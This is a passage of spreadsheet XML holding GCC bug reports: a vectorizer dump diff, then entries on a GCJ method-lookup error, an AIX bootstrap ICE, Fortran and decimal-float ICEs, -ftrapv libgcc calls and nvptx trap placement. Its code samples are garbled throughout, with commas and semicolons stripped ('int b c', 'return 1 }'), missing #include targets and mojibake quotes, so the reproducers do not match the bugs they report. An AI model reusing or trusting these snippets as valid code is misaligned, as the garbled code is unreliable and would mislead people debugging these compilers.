+       step alignment: 128
+       base_object: einc[5]
I  those are from the unrolled vectorized loop body.
+: note: not vectorized: no vectype for stmt: vect__37.58_227 = MEM[(real(kind=8) *)stress_203(D)]
+ scalar_type: vector(2) real(kind=8)
+: note: not vectorized: no vectype for stmt: vect__38.61_323 = MEM[(real(kind=8) *)
+ scalar_type: vector(2) real(kind=8)
+: note: not vectorized: no vectype for stmt: MEM[(real(kind=8) *)stress_203(D)] = vect__40.63_443
+ scalar_type: vector(2) real(kind=8)
+: note: not vectorized: no vectype for stmt: vect__37.58_432 = MEM[(real(kind=8) *)vectp_stress.56_441]
+ scalar_type: vector(2) real(kind=8)
+: note: not vectorized: no vectype for stmt: vect__38.61_431 = MEM[(real(kind=8) *)vectp_einc.59_440]
+ scalar_type: vector(2) real(kind=8)
+: note: not vectorized: no vectype for stmt: MEM[(real(kind=8) *)vectp_stress.64_439] = vect__40.63_429
+ scalar_type: vector(2) real(kind=8)
+: note: not vectorized: no vectype for stmt: vect__37.58_475 = MEM[(real(kind=8) *)vectp_stress.56_427]
+ scalar_type: vector(2) real(kind=8)
+: note: not vectorized: no vectype for stmt: vect__38.61_472 = MEM[(real(kind=8) *)vectp_einc.59_426]
+ scalar_type: vector(2) real(kind=8)
+: note: not vectorized: no vectype for stmt: MEM[(real(kind=8) *)vectp_stress.64_425] = vect__40.63_462
+ scalar_type: vector(2) real(kind=8)
+: note: got vectype for stmt: _41 = *stress_203(D)[0]
+vector(2) real(kind=8)
+: note: got vectype for stmt: *stress_203(D)[0] = _46
+vector(2) real(kind=8)
+: note: got vectype for stmt: _47 = *stress_203(D)[1]
+vector(2) real(kind=8)
+: note: got vectype for stmt: *stress_203(D)[1] = _48
+vector(2) real(kind=8)
+: note: got vectype for stmt: *stress_203(D)[2] = 0.0
+vector(2) real(kind=8)
+: note: got vectype for stmt: einc[4] = 0.0
+vector(2) real(kind=8)
+: note: got vectype for stmt: einc[5] = 0.0
+vector(2) real(kind=8)
 : note: === vect_analyze_data_ref_accesses ===
 : note: Detected interleaving store einc[0] and einc[1]
 : note: Detected interleaving store einc[0] and einc[2]
 : note: Detected interleaving store einc[0] and einc[3]
 : note: Detected interleaving store einc[0] and einc[4]
-: note: Detected interleaving store einc[0] and einc[5]
+: note: Detected interleaving store einc[4] and einc[5]
 : note: Detected interleaving store sinc[0] and sinc[1]
 : note: Detected interleaving store sinc[0] and sinc[2]
 : note: Detected interleaving store sinc[0] and sinc[3]
@@ -4759 +68314 @@
 : note: Detected interleaving load MEM[(struct material_type[0:] *)_1][_5].pval[6] and MEM[(struct material_type[0:] *)_1][_5].pval[15]
 : note: Detected interleaving load MEM[(struct material_type[0:] *)_1][_5].pval[6] and MEM[(struct material_type[0:] *)_1][_5].pval[16]
 : note: Detected interleaving load *stress_203(D)[0] and *stress_203(D)[1]
+: note: Detected interleaving load *stress_203(D)[0] and *stress_203(D)[1]
 : note: Detected interleaving load *stress_203(D)[0] and *stress_203(D)[2]
 : note: Detected interleaving load *stress_203(D)[0] and *stress_203(D)[3]
-: note: Detected interleaving store of size 6 starting with einc[0] = _24
+: note: Detected interleaving store *stress_203(D)[0] and *stress_203(D)[1]
+: note: Detected interleaving store *stress_203(D)[0] and *stress_203(D)[2]
+: note: Detected interleaving store of size 5 starting with einc[0] = _24
+: note: Detected interleaving store of size 2 starting with einc[4] = 0.0
+: note: not consecutive access einc[5] = 0.0
 : note: not consecutive access _1 = material.data
 : note: not consecutive access _2 = material.offset
 : note: not consecutive access p1 = _6
@@ -4867 +69910 @@
 : note: Detected interleaving load of size 11 starting with qr_195 = MEM[(struct material_type[0:] *)_1][_5].pval[6]
 : note: not consecutive access _3 = *matid_191(D)
 : note: not consecutive access _16 = *efps_201(D)
-: note: Detected interleaving load of size 4 starting with _13 = *stress_203(D)[0]
+: note: not consecutive access _13 = *stress_203(D)[0]
+: note: Two or more load stmts share the same dr.
+: note: Detected interleaving load of size 4 starting with _41 = *stress_203(D)[0]
+: note: Detected interleaving store of size 3 starting with *stress_203(D)[0] = _46
 : note: not consecutive access _22 = *dtnext_206(D)
 : note: not consecutive access _23 = *dxx_207(D)
 : note: not consecutive access _25 = *dyy_209(D)
 : note: vect_is_simple_use: operand _22
 : note: def_stmt: _22 = *dtnext_206(D)
 : note: type of def: internal
-: note: vect_is_simple_use: operand _441
-: note: def_stmt: _441 = (unsigned long) stress_203(D)
+: note: vect_is_simple_use: operand vect__38.61_323
+: note: def_stmt: vect__38.61_323 = MEM[(real(kind=8) *)
+: note: type of def: internal
+: note: vect_is_simple_use: operand vect__38.61_431
+: note: def_stmt: vect__38.61_431 = MEM[(real(kind=8) *)vectp_einc.59_440]
 : note: type of def: internal
-: note: vect_is_simple_use: operand _438
-: note: def_stmt: _438 = (unsigned int) _439
+: note: vect_is_simple_use: operand vect__38.61_472
+: note: def_stmt: vect__38.61_472 = MEM[(real(kind=8) *)vectp_einc.59_426]
 : note: type of def: internal
-: note: vect_is_simple_use: operand _439
-: note: def_stmt: _439 = -_440
+: note: vect_is_simple_use: operand _22
+: note: def_stmt: _22 = *dtnext_206(D)
+: note: type of def: internal
+: note: vect_is_simple_use: operand _6
+: note: def_stmt: _6 = MEM[(struct material_type[0:] *)_1][_5].pval[7]
 : note: type of def: internal
 : note: === vect_analyze_slp ===
 : note: Build SLP for einc[0] = _24
@@ -5407 +7626 @@
 : note: Build SLP for einc[2] = _28
 : note: Build SLP for einc[3] = _30
 : note: Build SLP for einc[4] = _32
-: note: Build SLP for einc[5] = _34
 : note: vect_is_simple_use: operand _24
 : note: def_stmt: _24 = _22 * _23
 : note: type of def: internal
 : note: vect_is_simple_use: operand _32
 : note: def_stmt: _32 = _22 * _31
 : note: type of def: internal
-: note: vect_is_simple_use: operand _34
-: note: def_stmt: _34 = _22 * _33
-: note: type of def: internal
 : note: Build SLP for _24 = _22 * _23
 : note: Build SLP for _26 = _22 * _25
 : note: Build SLP for _28 = _22 * _27
 : note: Build SLP for _30 = _22 * _29
 : note: Build SLP for _32 = _22 * _31
-: note: Build SLP for _34 = _22 * _33
 : note: vect_is_simple_use: operand _22
 : note: def_stmt: _22 = *dtnext_206(D)
 : note: type of def: internal
@@ -59512 +8126 @@
 : note: vect_is_simple_use: operand _31
 : note: def_stmt: _31 = *dxz_215(D)
 : note: type of def: internal
-: note: vect_is_simple_use: operand _22
-: note: def_stmt: _22 = *dtnext_206(D)
-: note: type of def: internal
-: note: vect_is_simple_use: operand _33
-: note: def_stmt: _33 = *dyz_217(D)
-: note: type of def: internal
 : note: Build SLP for _22 = *dtnext_206(D)
 : note: Build SLP failed: unvectorizable statement _22 = *dtnext_206(D)
 : note: Building vector operands from scalars
@@ -60821 +81910 @@
 : note: Build SLP failed: unvectorizable statement _23 = *dxx_207(D)
 : note: Building vector operands from scalars
 : note: Building parent vector operands from scalars instead
-: note: Final SLP tree for instance:
-: note: node
-: note:        stmt 0 einc[0] = _24
-: note:        stmt 1 einc[1] = _26
-: note:        stmt 2 einc[2] = _28
-: note:        stmt 3 einc[3] = _30
-: note:        stmt 4 einc[4] = _32
-: note:        stmt 5 einc[5] = _34</t>
  </si>
  <si>
    <t>GCC-30844</t>
  </si>
  <si>
    <t>invalid Can't find method error</t>
  </si>
  <si>
    <t>The following code placed in a file named A.java fails to compile with GCJ 4.1.0.  Sun's javac has no problem with it.  Interestingly if you comment out the line marked with /**/ the code compiles.
/* Begin A.java */
public class A
{
  public A() { }
  public int foo(Object a) { return 1 }
  public int foo(Object[] a) { return 1 }
  public static class B extends A
  {
    public B() { }
    /**/ public int foo(Object a) { return 1 }
  }
  public static class C extends B
  {
    public C() { }
    public int foo(Object[] a) { return super.foo(a) }
  }
}
/* End A.java */
The command I ran:
$ gcj4 -v -C A.java
Using built-in specs.
Target: i386-redhat-linux
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --enable-shared --enable-threads=posix --enable-checking=release --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --with-gxx-include-dir=/usr/include/c++/3.4.3 --enable-libgcj-multifile --enable-languages=cc++javaf95 --enable-java-awt=gtk --disable-dssi --with-java-home=/usr/lib/jvm/java-1.4.2-gcj-1.4.2.0/jre --with-cpu=generic --host=i386-redhat-linux
Thread model: posix
gcc version 4.1.0 20060515 (Red Hat 4.1.0-18)
 /usr/libexec/gcc/i386-redhat-linux/4.1.0/jc1 A.java -quiet -dumpbase A.java -mtune=generic -auxbase-strip NONE -g1 -version -fsyntax-only -femit-class-files -o A
GNU Java version 4.1.0 20060515 (Red Hat 4.1.0-18) (i386-redhat-linux)
        compiled by GNU C version 4.1.0 20060515 (Red Hat 4.1.0-18).
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Class path starts here:
    ./
    /home/rizzolo/lib/
    /home/rizzolo/lib/java_cup.jar/ (zip)
    /home/rizzolo/cogcomp/LBP/LBJ2/
    /usr/share/java/libgcj-4.1.0.jar/ (system) (zip)
A.java: In class 'A$C':
A.java: In method 'A$C.foo(java.lang.Object[])':
A.java:18: error: Can't find method â€˜foo([Ljava/lang/Object)â€™ in type â€˜A$Bâ€™. Candidates are:
  'A$B.foo(java.lang.Object)' in 'A$B'
  'A.foo(java.lang.Object[])' in 'A'.
    public int foo(Object[] a) { return super.foo(a) }
                                                 ^
1 error
By the way it is not necessary for classes A B and C to be defined in the same file with B and C defined as static member classes of A.  The problem is also present when the three classes are defined in separate files and not as member classes.
 - Nick</t>
  </si>
  <si>
    <t>rizzolo</t>
  </si>
  <si>
    <t>GCC-53042</t>
  </si>
  <si>
    <t>[4.8 Regression] AIX bootstrap: cgraph symbol table error</t>
  </si>
  <si>
    <t>AIX bootstrap is broken and apparently caused by your symbol table patches.
I now see errors:
/farm/dje/src/src/libstdc++-v3/src/c++98/strstream.cc:418:1: error: non-DECL_ONE_ONLY node in a same_comdat_group list
 } // namespace
 ^
_ZTCSt10istrstream0_Si/337 (int (* std::istrstream::_ZTCSt10istrstream0_Si [10])(...)) @70c3df78
  Type: variable
  Visibility: public weak comdat virtual artificial
  Same comdat group as: _ZTVSt10istrstream/335
  References: _ZTISi/486 (addr)_ZNSiD1Ev/311 (addr)_ZNSiD0Ev/312 (addr)_ZTISi/486 (addr)_ZTv0_n12_NSiD1Ev/487 (addr)_ZTv0_n12_NSiD0Ev/488 (addr)
  Referring: _ZTTSt10istrstream/336 (addr)_ZTTSt10istrstream/336 (addr)
  Availability: not-ready
  Varpool flags: initialized needed analyzed finalized
/farm/dje/src/src/libstdc++-v3/src/c++98/strstream.cc:418:1: internal compiler error: verify_symtab_node failed
 } // namespace
and
/farm/dje/src/src/libstdc++-v3/src/c++11/fstream-inst.cc:49:1: error: non-DECL_ONE_ONLY node in a same_comdat_group list
 } // namespace
 ^
_ZTCSt14basic_ifstreamIcSt11char_traitsIcEE0_Si/803 (int (* std::basic_ifstream::_ZTCSt14basic_ifstreamIcSt11char_traitsIcEE0_Si [10])(...)) @700c6708
  Type: variable
  Visibility: public weak comdat/farm/dje/src/src/libstdc++-v3/src/c++11/fstream-inst.cc:49:1: internal compiler error: tree check: expected identifier_node have string_cst in dump_symtab_base at symtab.c:405
 } // namespace</t>
  </si>
  <si>
    <t>GCC-82814</t>
  </si>
  <si>
    <t>ICE from submodule character function</t>
  </si>
  <si>
    <t>The following program gives an ICE with gfortran 7.2.0 and 6.4.0. Unfortunately I do not have version 8 to test.
module u
    implicit none
    interface unique
        module function uniq_char(input) result(uniq)
            character(*) intent(in) :: input(:)
            character(size(input)) allocatable :: uniq(:)
        end function uniq_char
    end interface unique
end module u
submodule (u) z
    implicit none
contains
    module function uniq_char(input) result(uniq)
        character(*) intent(in) :: input(:)
        character(size(input)) allocatable :: uniq(:)
            allocate(uniq(1))
            uniq = 'A'
    end function uniq_char
end submodule z
program test_uniq
    use u only: unique
    implicit none
    write(**) unique(['1''2''1''2'])
end program test_uniq
ICE:
test_uniq.f:27:0:
             allocate(uniq(1))
internal compiler error: Segmentation fault: 11
test_uniq.f:27:0: internal compiler error: Abort trap: 6
The program compiles and runs if any of:
- character variables are replaced with integer or real variables
- the submodule is not used and the function is placed within module u
- the variable 'uniq' is given a fixed length e.g. character(1).
I'm running on a macbook 10.12.6 using gfortran from macports.
WB</t>
  </si>
  <si>
    <t>GCC-78088</t>
  </si>
  <si>
    <t>[7 Regression] error: non-trivial conversion in unary operation</t>
  </si>
  <si>
    <t>markus@x4 /tmp % cat scimage.ii
class A {
public:
  int m_fn1()
}
struct B : A {
  void m_fn2()
}
void B::m_fn2() {
  long a
  int b c
  for () {
    c = 0
    for ( c &lt; a ++c ++b)
      b &gt; 0 ? m_fn1() : 0
  }
}
markus@x4 /tmp % g++ -O3 -c scimage.ii
scimage.ii: In member function â€˜bool B::m_fn2()â€™:
scimage.ii:8:6: error: non-trivial conversion in unary operation
 bool B::m_fn2() {
      ^
long int
int
_34 = -b_2
scimage.ii:8:6: internal compiler error: verify_gimple failed
0xda8760 verify_gimple_in_cfg(function* bool)
        ../../gcc/gcc/tree-cfg.c:5208
0xc89d57 execute_function_todo
        ../../gcc/gcc/passes.c:1965
0xc8ae2c execute_todo
        ../../gcc/gcc/passes.c:2015</t>
  </si>
  <si>
    <t>GCC-70052</t>
  </si>
  <si>
    <t>[5/6 Regression] ICE compiling _Decimal128 test case</t>
  </si>
  <si>
    <t>We ICE with the following test case.
bergner@genoa:~/gcc/BUGS/DFP/arith128-P8AT9/src$ cat ice.i 
typedef struct
{
  _Decimal128 td0
  _Decimal128 td1
} TDx2_t
TDx2_t
D256_add_finite (void)
{
  _Decimal128 z zz
  TDx2_t result = {0.DL 0.DL}
  if (zz == 0.DL)
  {
    result.td0 = z
    return result
  }
  return result
}
bergner@genoa:~/gcc/BUGS/DFP/$ /home/bergner/gcc/build/gcc-fsf-mainline-base-debug/gcc/xgcc -B/home/bergner/gcc/build/gcc-fsf-mainline-base-debug/gcc -O2 -mcpu=power8 -S ice.i 
ice.i: In function â€˜D256_add_finiteâ€™:
ice.i:21:1: error: unrecognizable insn:
 }
 ^
(insn 110 19 111 3 (set (reg:DD 33 1)
        (const_double:DD 0E-398 [N/A])) ice.i:17 -1
     (nil))
ice.i:21:1: internal compiler error: in extract_insn at recog.c:2287
0x10c0b3d7 _fatal_insn(char const* rtx_def const* char const* int char const*)
	/home/bergner/gcc/gcc-fsf-mainline-base/gcc/rtl-error.c:108
0x10c0b44f _fatal_insn_not_found(rtx_def const* char const* int char const*)
	/home/bergner/gcc/gcc-fsf-mainline-base/gcc/rtl-error.c:116
0x10b8f313 extract_insn(rtx_insn*)
	/home/bergner/gcc/gcc-fsf-mainline-base/gcc/recog.c:2287
0x10b8eddf extract_insn_cached(rtx_insn*)
	/home/bergner/gcc/gcc-fsf-mainline-base/gcc/recog.c:2178
0x10712067 cleanup_subreg_operands(rtx_insn*)
	/home/bergner/gcc/gcc-fsf-mainline-base/gcc/final.c:3104
0x10b916b7 split_insn
	/home/bergner/gcc/gcc-fsf-mainline-base/gcc/recog.c:2901
0x10b918a7 split_all_insns()
	/home/bergner/gcc/gcc-fsf-mainline-base/gcc/recog.c:2955
0x10b94973 rest_of_handle_split_after_reload
	/home/bergner/gcc/gcc-fsf-mainline-base/gcc/recog.c:3891
0x10b94a33 execute
	/home/bergner/gcc/gcc-fsf-mainline-base/gcc/recog.c:3920
Please submit a full bug report</t>
  </si>
  <si>
    <t>GCC-3763</t>
  </si>
  <si>
    <t>Internal compiler error in update_equiv_regs at local-alloc.c:1097</t>
  </si>
  <si>
    <t xml:space="preserve">	Internal compiler error in update_equiv_regs at
	local-alloc.c:1097 when compiling with -O1 or higher.
Release:
3.0.1 20010720 (prerelease)
Environment:
System: Linux sykes 2.4.4-SMP #1 SMP Fri Jun 8 09:14:46 GMT 2001 ia64 unknown
Architecture: ia64
host: ia64-unknown-linux-gnu
build: ia64-unknown-linux-gnu
target: m68k-unknown-linux-gnu
configured with: /cvs/branch/gcc/configure --target=m68k-linux --prefix=/usr/local/m68k-linux --enable-languages=c++ --with-ld=/usr/local/m68k-linux/m68k-linux/bin/ld --with-as=/usr/local/m68k-linux/m68k-linux/bin/as --disable-shared : (reconfigured) /cvs/branch/gcc/configure --target=m68k-linux --prefix=/usr/local/m68k-linux --enable-languages=c++ --with-ld=/usr/local/m68k-linux/m68k-linux/bin/ld --with-as=/usr/local/m68k-linux/m68k-linux/bin/as --disable-shared : (reconfigured)
How-To-Repeat:
	$ cat x.i
	typedef long int __clock_t
	typedef __clock_t clock_t
	struct tms
	  {
	    clock_t tms_utime
	    clock_t tms_stime
	    clock_t tms_cutime
	    clock_t tms_cstime
	  }
	extern clock_t __times (struct tms *__buffer)
	enum
	  {
	    _SC_ARG_MAX
	    _SC_CHILD_MAX
	    _SC_CLK_TCK
	  }
	extern long int sysconf (int __name) __attribute__ ((__const__))
	clock_t
	clock (void)
	{
	  struct tms buf
	  long clk_tck = __sysconf (_SC_CLK_TCK)
	  __times (
	  return
	    (clk_tck &lt;= 1000000l)
	    ? ((unsigned long) buf.tms_utime + buf.tms_stime) * (1000000l
								 / clk_tck)
	    : ((unsigned long) buf.tms_utime + buf.tms_stime) / (clk_tck
								 / 1000000l)
	}
	$ m68k-linux-gcc -c -O x.i -v
	Reading specs from /usr/local/m68k-linux/lib/gcc-lib/m68k-linux/3.0.1/specs
	Configured with: /cvs/branch/gcc/configure --target=m68k-linux --prefix=/usr/local/m68k-linux --enable-languages=c++ --with-ld=/usr/local/m68k-linux/m68k-linux/bin/ld --with-as=/usr/local/m68k-linux/m68k-linux/bin/as --disable-shared : (reconfigured) /cvs/branch/gcc/configure --target=m68k-linux --prefix=/usr/local/m68k-linux --enable-languages=c++ --with-ld=/usr/local/m68k-linux/m68k-linux/bin/ld --with-as=/usr/local/m68k-linux/m68k-linux/bin/as --disable-shared : (reconfigured) 
	Thread model: single
	gcc version 3.0.1 20010720 (prerelease)
	 /usr/local/m68k-linux/lib/gcc-lib/m68k-linux/3.0.1/cc1 -fpreprocessed x.i -quiet -dumpbase x.i -O -version -o /tmp/cc8ryOGP.s
	GNU CPP version 3.0.1 20010720 (prerelease) (cpplib) (68k GNU/Linux with ELF)
	GNU C version 3.0.1 20010720 (prerelease) (m68k-linux)
		compiled by GNU C version 2.96-ia64-000717 snap 001117.
	x.i: In function `clock':
	x.i:30: Internal compiler error in update_equiv_regs at local-alloc.c:1097
	Please submit a full bug report
	with preprocessed source if appropriate.
	See  for instructions.</t>
  </si>
  <si>
    <t>GCC-52478</t>
  </si>
  <si>
    <t>-ftrapv calls the wrong functions in libgcc</t>
  </si>
  <si>
    <t>As PR 19020 has been closed (let's ditch antiquated stuff and start afresh) - open a fresh bug.
Using -ftrapv works with i368-gnu-linux:
$ gcc -m32 -ftrapv hjfff.c &amp;&amp; ./a.out
Aborted (core dumped)
$
But not on x86-64-gnu-linux:
$ gcc -m64 -ftrapv hjfff.c &amp;&amp; ./a.out
$
In the debugger one sees:
a) i386:
__addvsi3 (a=2147483647 b=1) at /home/tob/projects/gcc-trunk-checkout/libgcc/libgcc2.c:79
(gdb) pt a
type = int
b) x86-64:
(gdb)
__addvdi3 (a=2147483647 b=1) at /home/tob/projects/gcc-trunk-checkout/libgcc/libgcc2.c:82
(gdb) pt a
type = long int
Thus there is no overflow in that function.
THUS: On i386 it calls the correct function but on x86-64 it should call the SI not the DI function.
 * * *
For long/LONG_MAX one has again:
a) -m32
__addvsi3 (a=2147483647 b=1) at /home/tob/projects/gcc-trunk-checkout/libgcc/libgcc2.c:79
79      {
(gdb) pt a
type = int
b) -m64
__addvdi3 (a=9223372036854775807 b=1) at /home/tob/projects/gcc-trunk-checkout/libgcc/libgcc2.c:82
82        if (b &gt;= 0 ? w  a)
(gdb) pt a
type = long int
THUS: x86-64 calls correctly the DI function but i386 wrongly the SI function
 * * *
long long / LLONG_MAX:
a) -m32:
__addvdi3 (a=9223372036854775807 b=1) at /home/tob/projects/gcc-trunk-checkout/libgcc/libgcc2.c:82
82        if (b &gt;= 0 ? w  a)
(gdb) pt a
type = long int
b) -m64
__addvdi3 (a=9223372036854775807 b=1) at /home/tob/projects/gcc-trunk-checkout/libgcc/libgcc2.c:82
82        if (b &gt;= 0 ? w  a)
(gdb) pt a  
type = long int
THUS: Both x86-64 and i386 call the long int instead of the long long function. I had exepected a TI version which does not seem to exist.
 * * *
#include 
int __attribute__((noinline))
iaddv (int a int b)
{
  return a + b
}
int main(void)
{
  return iaddv (INT_MAX 1)
}</t>
  </si>
  <si>
    <t>GCC-61318</t>
  </si>
  <si>
    <t>Improve error diagnostic by pointing to the expression and not to declared-at of a USE-associated variable</t>
  </si>
  <si>
    <t>Found at https://groups.google.com/forum/#!topic/comp.lang.fortran/H-xEKHAWEZ4 - without properly checking whether it has been reported before or not.
The error message
  use gbl_message
      1
Error: Type mismatch in argument 'message' at (1) passed INTEGER(4) to
CHARACTER(1) 
is misleading and seems to point to the sym-&gt;declared_at of the symbol instead of to the expr-&gt;where in the call statement. Especially for USE-associated variables the sym-&gt;decared_at is not a very helpful daignostic location.
module gbl_message
  type :: mytype
    integer(kind=4) :: e
  end type mytype
  type(mytype) parameter :: seve = mytype(1)
end module gbl_message
!
module gbl_interfaces
  interface
    subroutine gagout(message)
      character(len=*) intent(in) :: message
    end subroutine gagout
  end interface
end module gbl_interfaces
!
program test
  use gbl_message
  use gbl_interfaces
  call gagout(seve%e'Some string')
end program test</t>
  </si>
  <si>
    <t>GCC-19584</t>
  </si>
  <si>
    <t>[4.0 Regression] ICE: insn does not satisfy its constraints</t>
  </si>
  <si>
    <t>With current GCC CVS (4.0.0 20050122) I get the following ICE compiling glibc: 
/opt/gcc/4.0-devel/libexec/gcc/x86_64-suse-linux-gnu/4.0.0/cc1 -fpreprocessed 
s_fma2.i -quiet -dumpbase s_fma.c -mtune=k8-auxbase-strip /tmp/s_fma.o -g -O2 
-Wall -Winline -Wno-pointer-sign -Wstrict-prototypes -Wwrite-strings 
-Wno-uninitialized -std=gnu99 -version -o s_fma.s 
GNU C version 4.0.0 20050122 (experimental) (x86_64-suse-linux-gnu) 
        compiled by GNU C version 4.0.0 20050122 (experimental). 
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096 
s_fma2.i: In function ?__fma?: 
s_fma2.i:123: error: insn does not satisfy its constraints: 
(insn 268 84 86 7 s_fma2.i:5 (set (reg/v:DI 21 xmm0 [orig:79 _bitsy ] [79]) 
        (const_int 2310346608841064448 [0x2010000000000000])) 81 
{*movdi_1_rex64} (nil) 
    (nil)) 
s_fma2.i:123: internal compiler error: in reload_cse_simplify_operands at 
postreload.c:391 
Please submit a full bug report 
with preprocessed source if appropriate. 
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-69105</t>
  </si>
  <si>
    <t>front_/back_/insert_iterator should use addressof</t>
  </si>
  <si>
    <t>Test case:
#include 
#include 
struct test : std::deque {
    void operator
}
int main() {
    test t
    std::back_insert_iterator b(t)
    std::front_insert_iterator f(t)
    std::insert_iterator i(t t.begin())
}
http://wg21.link/LWG2324 requires std::addressof to be used.</t>
  </si>
  <si>
    <t>GCC-42855</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/tree-ssa/pr42585.c scan-tree-dump-times optimized *</t>
  </si>
  <si>
    <t>On powerpc*-*-* gcc.dg/tree-ssa/pr42585.c fails with:
FAIL: gcc.dg/tree-ssa/pr42585.c scan-tree-dump-times optimized struct _fat_ptr _ans 0
FAIL: gcc.dg/tree-ssa/pr42585.c scan-tree-dump-times optimized struct _fat_ptr _T2 0
(see http://gcc.gnu.org/ml/gcc-testresults/2010-01/msg02116.html or http://gcc.gnu.org/ml/gcc-testresults/2010-01/msg02115.html ):
[karma] f90/bug% gcc45 -c -O1 -fdump-tree-optimized /opt/gcc/gcc-4.5-work/gcc/testsuite/gcc.dg/tree-ssa/pr42585.c
[karma] f90/bug% grep struct pr42585.c.139t.optimized
Cyc_string_ungetc (int ignore struct _fat_ptr * sptr)
  struct _fat_ptr _ans
  struct _fat_ptr _T2
This has probably started with
Author: jamborm
Date: Thu Jan 21 16:18:06 2010
New Revision: 156156
URL: http://gcc.gnu.org/viewcvs?root=gcc&amp;view=rev&amp;rev=156156
Log:
2010-01-21  Martin Jambor  
	PR tree-optimization/42585
	* tree-sra.c (struct access): New field grp_total_scalarization.
	(dump_access): Dump the new field.
	(should_scalarize_away_bitmap): New variable.
	(cannot_scalarize_away_bitmap): Likewise.
	(sra_initialize): Allocate new bitmaps.
	(sra_deinitialize): Free new bitmaps.
	(create_access_1): New function.
	(create_access): Parts moved to create_access_1.
	(type_consists_of_records_p): New function.
	(completely_scalarize_record): Likewise.
	(build_access_from_expr): Set bit in cannot_scalarize_away_bitmap.
	(build_accesses_from_assign): Set bits in should_scalarize_away_bitmap.
	(sort_and_splice_var_accesses): Hint groups with a total_scalarization
	access.
	(analyze_all_variable_accesses): Completely scalarize small eligible
	records.
	* testsuite/gcc.dg/tree-ssa/pr42585.c: New test.
Added:
    trunk/gcc/testsuite/gcc.dg/tree-ssa/pr42585.c
Modified:
    trunk/gcc/ChangeLog
    trunk/gcc/testsuite/ChangeLog
    trunk/gcc/tree-sra.c</t>
  </si>
  <si>
    <t>GCC-81352</t>
  </si>
  <si>
    <t>[nvptx] trap placement for non-returning function call in vector-single mode</t>
  </si>
  <si>
    <t>Consider the following fortran test-case:
...
program foo
  integer :: a(224) k kk kkk
  a = 2
  !$acc parallel num_gangs(1) num_workers(1) vector_length(32)                                                     
  !$acc loop gang(static:1)                                                                                        
  do k=12
     if (any(a(k1:21:4).ne.2)) call abort
  enddo
  !$acc end parallel                                                                                               
end program
...
We generate the following ptx for -O2:
....
        {
                .reg .u32 %x
                mov.u32 %x%tid.x
                setp.ne.u32 %r47%x0
        }
        ...
        @ %r47 bra $L12
        {
                call _gfortran_abort
                trap
        }
$L12:
$L3:
...
which results in this SASS generated with -O4:
...
        /*01f8*/                   ISETP.NE.U32.AND P0 PT R21 RZ PT
	/*0208*/                   SSY `(.L_25)
	/*0210*/               @P0 BRA `(.L_26)
        /*0218*/                   JCAL `(_gfortran_abort)
        /*0220*/                   BPT.TRAP 0x1
.L_26:
        /*0228*/                   NOP.S
.L_25:
...
We have to think of the diverging branch '@P0 BRA `(.L_26)' as executing both paths one after the other with different threads in the warp enabled without any guarantee which path will be executed first. 
The paths end at an instruction with the .s prefix and after the execution of the second path converged execution is resumed at the target of the SSY insn: .L_25.
So either we execute this sequence:
1. branch taken path first:
	/*0208*/                   SSY `(.L_25)
	/*0210*/               @P0 BRA `(.L_26)
        /*0228*/                   NOP.S
        /*0218*/                   JCAL `(_gfortran_abort)
or this one:
2. branch not taken path first:
	/*0208*/                   SSY `(.L_25)
	/*0210*/               @P0 BRA `(.L_26)
        /*0218*/                   JCAL `(_gfortran_abort)
In both cases we reliably end up at _gfortran_abort at runtime. So the generated code is not wrong.
But it looks fragile to me. What guarantees us that a sync point is in fact generated? That's not so clear given that there's no clear post-domination point because one of the paths ends in a trap.  And if no sync point is generated execution can fall through and execute random code after $L12.
Furthermore while the trap placement right after the _gfortran_abort call is accurate in the sense that that's the function call not returning so that's where the control flow barrier is it's clear that the code does not intend to execute past $L3 in any of the other threads in the warp.
So the more clear (and possibly more reliable trap) placement is this:
...
        @ %r47 bra $L12
        {
                call _gfortran_abort
        }
$L12:
                trap
$L3:
...
Resulting in this SASS code:
...
        /*01f8*/                   ISETP.NE.U32.AND P0 PT R21 RZ PT
	/*0208*/                   SSY `(.L_26)
	/*0210*/               @P0 BRA `(.L_27)
        /*0218*/                   JCAL `(_gfortran_abort)
.L_27:
        /*0220*/                   NOP.S
.L_26:
        /*0228*/                   BPT.TRAP 0x1
...
Note that the trap is placed after the sync pont .L_26.</t>
  </si>
  <si>
    <t>GCC-78629</t>
  </si>
  <si>
    <t>vec.h: null pointer passed as argument 1 which is declared to never be null</t>
  </si>
  <si>
    <t>build/genmatch --gimple match.pd gives following runtime error when
it's built with ubsan:
../../gcc/gcc/vec.h:1609:3: runtime error: null pointer passed as argument 1 which is declared to never be null
/usr/include/x86_64-linux-gnu/bits/string3.h:90:70: runtime error: null pointer passed as argument 1 which is declared to never be null
GIMPLE decision tree has 1846 leafs maximum depth 12 and a total number of 7248 nodes
removed 1070 duplicate tails
../../gcc/gcc/vec.h:1609:3: runtime error: null pointer passed as argument 1 which is declared to never be null
    #0 0x44fb51 in vec va_heap vl_ptr&gt;::safe_grow_cleared(unsigned int) ../../gcc/gcc/vec.h:1609
    #1 0x44fb51 in parser::finish_match_operand(operand*) ../../gcc/gcc/genmatch.c:4801
    #2 0x45d597 in parser::parse_simplify(simplify::simplify_kind vec&amp; predicate_id* operand*) ../../gcc/gcc/genmatch.c:4433
    #3 0x45e70b in parser::parse_pattern() ../../gcc/gcc/genmatch.c:4745
    #4 0x466213 in parser::parser(cpp_reader*) ../../gcc/gcc/genmatch.c:4855
    #5 0x40a899 in main ../../gcc/gcc/genmatch.c:4953
    #6 0x7fafc65e982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #7 0x40bbd8 in _start (/home/bilbo/gnu-toolchain/gcc/master/ubsan-stage1-build/gcc/build/genmatch+0x40bbd8)
Thanks
Prathamesh</t>
  </si>
  <si>
    <t>GCC-44694</t>
  </si>
  <si>
    <t>[4.5 Regression] Long var tracking compile time of GiNaC tests</t>
  </si>
  <si>
    <t>Compile time of GiNaC tests increased a lot (to about 10 minutes) since 4.4
 variable tracking     : 315.80 (96%) usr   0.27 (36%) sys 316.16 (96%) wall   54301 kB (15%) ggc</t>
  </si>
  <si>
    <t>GCC-78064</t>
  </si>
  <si>
    <t>unwind-c.c never uses _Unwind_GetIPInfo</t>
  </si>
  <si>
